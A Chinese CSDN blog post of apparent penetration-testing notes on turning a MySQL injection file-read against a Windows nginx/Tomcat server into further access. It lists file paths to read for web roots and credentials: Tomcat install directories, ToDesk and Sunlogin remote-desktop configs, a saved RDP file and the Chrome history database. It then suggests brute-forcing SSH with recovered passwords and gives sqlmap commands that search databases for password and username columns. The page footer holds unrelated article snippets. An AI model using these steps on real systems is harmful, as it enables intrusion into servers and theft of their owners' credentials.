mysql注入读文件思考

已于 2024-06-01 08:14:03 修改
阅读量202 收藏
点赞数 2
文章标签: mysql 数据库
于 2024-05-31 17:22:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/139356479
版权

mysql注入能读文件,配合物理路径写文件的时候。

有时候能读能写

有时候能读不能写

读又分目标windows和linux,linux比较好办,

遇到个windows的,nignx + tomcat的。

nginx的配置文件读到了,但是不解析,尝试了各种组合找tomcat配置文件均没有成功。

1. 因为不是php 所以phpinfo不考虑。

2.  tomcat页面就一个404页面,不报错不显示完整路径,所以tomcat还是找不到。上传长文件linux爆出物理路径还是有希望的

3.  读windows索引文件,成功率不大

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb

还不如读 Everything.exe 索引靠谱

%LOCALAPPDATA%\Everything\Everything.db

还是没读到,

linux可以读系统环境变量.

/etc/profile

很可能读到tomcat安装路径,然后补充路径读网站路径

/conf/server.xml

windows 尝试了读,没有读到

%CATALINA_BASE%
%CATALINA_HOME%
%TOMCAT_HOME%

windows和linux环境下(最好是先看一下目标服务器tomcat版本)

C:\Apache Tomcat\
C:\Apache Tomcat-8.0.53\
C:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
C:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
C:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
C:\apache-tomcat-8.0.53\
C:\ComputerLearning\tomcat8.0.53 \bin
C:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
C:\Program Files\Apache Software Foundation\Tomcat 8.0.53\ 
C:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53 
C:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
C:\Tomcat\
C:\tomcat\apache-tomcat-8.0.53 \
C:\tomcat\apache-tomcat-8.0.53\
C:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
C:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
C:\tomcat-8.0.53\
D:\Apache Tomcat\
D:\Apache Tomcat-8.0.53\
D:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
D:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
D:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
D:\apache-tomcat-8.0.53\
D:\ComputerLearning\tomcat8.0.53 \bin
D:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
D:\Program Files\Apache Software Foundation\Tomcat 8.0.53\ 
D:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53 
D:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
D:\Tomcat\
D:\tomcat\apache-tomcat-8.0.53 \
D:\tomcat\apache-tomcat-8.0.53\
D:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
D:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
D:\tomcat-8.0.53\
E:\Apache Tomcat\
E:\Apache Tomcat-8.0.53\
E:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
E:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
E:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
E:\apache-tomcat-8.0.53\
E:\ComputerLearning\tomcat8.0.53 \bin
E:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
E:\Program Files\Apache Software Foundation\Tomcat 8.0.53\ 
E:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53 
E:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
E:\Tomcat\
E:\tomcat\apache-tomcat-8.0.53 \
E:\tomcat\apache-tomcat-8.0.53\
E:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
E:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
E:\tomcat-8.0.53\
F:\Apache Tomcat\
F:\Apache Tomcat-8.0.53\
F:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
F:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
F:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
F:\apache-tomcat-8.0.53\
F:\ComputerLearning\tomcat8.0.53 \bin
F:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
F:\Program Files\Apache Software Foundation\Tomcat 8.0.53\ 
F:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53 
F:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
F:\Tomcat\
F:\tomcat\apache-tomcat-8.0.53 \
F:\tomcat\apache-tomcat-8.0.53\
F:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
F:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
F:\tomcat-8.0.53\

tomcat一些安装路径:

/home/username/tomcat/
/home/username/tomcat-8.0.53/
/opt/tomcat/
/opt/tomcat/apache-tomcat-8.0.53/
/opt/tomcat-8.0.53/
/usr/local/apache-tomcat-8.0.53/
/usr/local/tomcat/
/usr/local/tomcat-8.0.53/
/www/server/tomcat/
/www/server/tomcat-8.0.53/

还是读不到,尝试了读todesk和向日葵

C:\Program Files (x86)\ToDesk\config.ini
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
C:\Program Files\ToDesk\config.ini
C:\ProgramData\Oray\SunloginClient\config.ini
C:\ProgramData\Oray\SunloginClient\sys_config.ini
C:\ProgramData\Oray\SunloginClientLite\config.ini
C:\ProgramData\ToDesk\config.ini

还是没有读到,

还可以尝试读:rdp哦

C:\Users\Administrator\Documents\Default.rdp

我这个读到了,但是那个吊毛没有保存连接密码

尝试读浏览器历史:谷歌浏览器

C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\History 
它是一个SQLite数据库文件

也没读到东西,还可以尝试读桌面的一些可能快捷方式。

目标开了mysql,就不用这么麻烦了,当然ssh也会要去爆一下,

然后子域名资产的 其他服务器端口,根据mysql密码 还有后台账号,也可以生成社工点去爆一下。

数据库里面 

sqlmap.py  -r  a.txt   --search  -T  admin、user、config

sqlmap.py  -r  a.txt   --search  -C  password、username、userpwd、user、pass

sqlmap.py  -r  a.txt   --search  -C  config、menu、list    这个很可能会泄露邮箱和路径什么的

sqlmap.py  -r  a.txt   --search  -C  filename、file、name    这个很可能存放物理路径

低调求绕过,没事写博客
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入审计_【代码审计】对Beescms SQL注入漏洞的进一步思考
weixin_35638218的博客
01-28 332
0x02 Mysql注入的一个特性上篇分析到,由于函数fl_html()的影响,其实就是php函数htmlspecialchars(),导致不能写shell到目标机器。其实这里利用Mysql注入的一个特性就可以达到注入的效果。即对shell部分进行Hex编码,或者用mysql函数char()就可以轻松绕过这里的限制。方法一 hex编码我们写入shell的语句是:[SQL] 纯文本查看 复制代码us...
tp中如何防止mysql注入_thinkphp如何防止sql注入xss攻击
weixin_42327688的博客
01-19 1611
SQL注入简介SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一...
SQL注入总结(mysql
qq_52768407的博客
11-05 132
总结了一些sql注入的原理、产生原因、防御方式等关于sql注入的一些知识
mysql注入找路径_MySQLjsp注入一则Tomcat找路径技巧
weixin_34755947的博客
01-28 255
知道什么是注入中的大爱吗?注入里的大爱莫过于Tomcat+jsp+MySQL了,原因很简单,Tomcat需要SYSTEM或者root的权限,而使用jsp+MySQL的又通常是root,jsp没有php类的GPC换句话说,这种环境的这种注入,只要有注入点,服务器就八九不离十注入跟着数据库类型走,所以jsp+MySQL注入与php+MySQL注入的开始步骤几乎一致。关于注入的基本步骤请出门左拐,本...
mysql注入反弹_一个mysql注入引发的通宵
weixin_34219634的博客
01-19 202
本来没准备通宵的,在t00ls看了会文章,然后准备睡觉,就在准备睡觉的时候,无意中发现了以前看过的某站(我属于看干劲做事的那种,当时没干劲,没搞下,然后最近干劲十足,在一看发现遍地是漏洞。。。)然后,我的通宵之mysql注入艰难拿shell就此开始......发现SQL注入漏洞跑了下二级,然后打开一个个随手测试,因为当时准备睡觉了,所以也就没想过认真搞。。。加个admin,后台出来,输入admin...
mysql注入扫描网站漏洞工具_网站安全检测,高手必备几款SQL注入工具
weixin_28912709的博客
02-19 2658
按照百度说法,SQL注入是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 利用SQL注入,攻击者可远程利用SQL注入漏洞,窃取用户数据库数据,包括用户名、密码、登陆凭证等,甚至可以控制服务器的权限,对于网站进行挂码。下面介绍几种SQL注入工具,可以检测网站是否存在这方面的漏洞。1. Havij Havij是一款自动化的SQL注入工具,...
mysql prepare 注入_实战1:如何用 PREPARE 防止 SQL 注入
weixin_30660429的博客
01-28 622
实战1:如何用 PREPARE 防止 SQL 注入1. 前言在前面的小节中,我们一起学习了 SQL Prepare,本小节以实战的角度来继续深挖 Prepare,如果你还不了解 Prepare,请先阅 Prepare 小节,然后再来学习本小节。本质上讲,SQL 注入是一个安全性的话题。如果你的程序没有任何防止 SQL 注入的措施,那么你的程序是极端危险的,用户数据可能会被窃取、篡改,造成不可估量...
mysql .frm文件丢失_【1.1】mysql frm文件丢失(ibd文件丢失)
weixin_33680447的博客
01-19 380
【1】故障模拟准备环境这里以innodb为例【1.1】配置参数开启独立表空间innodb_file_per_table;【1.2】构建测试数据create database test;create table a(id int,num int);insert into a values(1,11),(2,12);【2】故障模拟【2.1】在业务正在运行的情况下,手动删除 test库 下的 a.f...
mysql 复制数据文件_mysql数据库搬家,可以直接复制数据库文件
weixin_36398572的博客
01-19 322
诶?这项技术又是什么玩意(What)?这项技术为什么会存在?我们已经有那么多解决方案(Method)了,我们为什么要用它(Why)?如果这项技术那么好且我们正好有场景可以用到这项技术,且能使我们的系统得到很乐观的优化,那么我们怎么用呢(How)?大概已经有同学觉得这些问题很熟悉了,是的,这就是黄金全法则提出的三个问题,对于每种新鲜事物我们首先基于这三个问题去了解,更有利于弄清楚事情的本质,端正态度...
《Java程序设计案例教程》教学课件09Java数据库编程.pptx
05-30
能够在MyEclipse IDE中编写预编译SQL语句对MySQL数据库中的数据记录进行操作及防止SQL注入。 《Java程序设计案例教程》教学课件09Java数据库编程全文共26页,当前为第3页。 9.1 回顾与思考 在软件开发过程中,通常...
Java学习方法-并且涵盖了学习任何一门语言需要的动力.docx
09-30
通过处理文本文件、CSV数据、取和操作文件系统、与数据库交互等实践项目,可以增强对编程的理解。学会使用print等简单调试方法,同时善用Google搜索技术问题和阅技术博客。 其次,熟练掌握一种程序员编辑器,如...
Java程序员面试题与经验工与总结.docx
01-29
* Spring 框架相关问题:Spring 用了哪些设计模式,Spring 中 AOP 主要用来做什么,Spring 注入 bean 的方式,IOC 和依赖注入等。 * Mybatis 和 Hibernate 相关问题:Mybatis/Hibernate 的缓存机制,Mybatis 的 ...
Tsung_测试XMPP_安装使用说明
09-11
tsung是用erlang开发的一款简单易用的压力测试工具,目前仅支持linux各版本系统安装,有tar.gz和deb两种安装文件, 目前我们测试用的是CentOS或RedHat两种操作系统,因此选择tar.gz安装文件,总的来说tsung工具有...
网站项目可行性报告.doc
11-23
我们通过同行业其他公司的网站分析结合自己的思考,决定在网站结构上以服务内容和公司信息为主,突出网站的互动性,让客户和我们公司员工更方便的随时了解我们行业的各种动态变化。 3.1.1 公司网站概览 在页面色彩...
在JPA项目启动时新增MySQL字段
VioletKiss
06-18 961
我用的方案1,如果你也是这种项目,那么我也推荐你用方案1,简单粗暴又方便;方案2是问了chatgpt得出来的答案,感觉不错,但是报错了又不想改;不建议使用 schema.sql 和 data.sql 对数据库结构及数据进行初始化,因为在每一次项目启动,这两个文件都必须执行一次,大大减慢了项目的启动速度,替代方案可以是使用 flyway 进行数据库版本控制。
mysqladmin——MySQL Server管理程序(二)
u011565038的博客
06-22 666
mysqladmin是一个命令行工具,用于执行简单的 MySQL 服务器管理任务,如检查服务器的状态、创建和删除数据库、重载权限等。
Java学习 - MySQL常用性能优化 + Explain查看执行计划
paofuluolijiang的博客
06-18 578
【代码】Java学习 - MySQL常用性能优化 + Explain查看执行计划。
Mysql之GROUP BY与PARTITION BY区别
最新发布
m0_51014049的博客
06-22 183
PARTITION BY 是窗口函数的一部分,用于定义窗口(即数据分区),但是它不会改变结果集的行数。PARTITION BY 用于窗口函数内,将结果集划分为几个分区,计算聚合值或其他窗口函数。这个查询会返回每一行,并在每一行中增加一个列 totalAmount,它表示的是该 employee_id 内所有 amount 的总和。结果集:GROUP BY 改变结果集的行数,只返回每组一行。PARTITION BY 用于窗口函数,增加计算列,不改变结果集的结构。
mysql文件取权限
09-12
要修改MySQL文件取权限,可以通过以下几种方法: 1. 修改mysql.cnf文件:在mysqld下添加条目secure_file_priv,可以指定文件取权限的路径。同时,在mysqld下添加local-infile=1选项,在mysql下也添加local-infile=1选项。 2. 使用System命令:在MySQL版本为5.x时,可以使用系统命令直接文件。需要注意的是,此方法只能在本地取,无法在远程连接MySQL时使用System命令。而且,此方法无法越权文件,即只能取具有取权限的文件。 3. secure_file_priv文件:secure_file_priv是MySQL的配置文件,其值有三种情况。当值为null时,表示无法取任何文件;默认值为/var/lib/mysql-files/时,表示可以取具有取权限的文件,并且只能在该路径下文件;当值为无时,表示可以取任意路径下的文件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值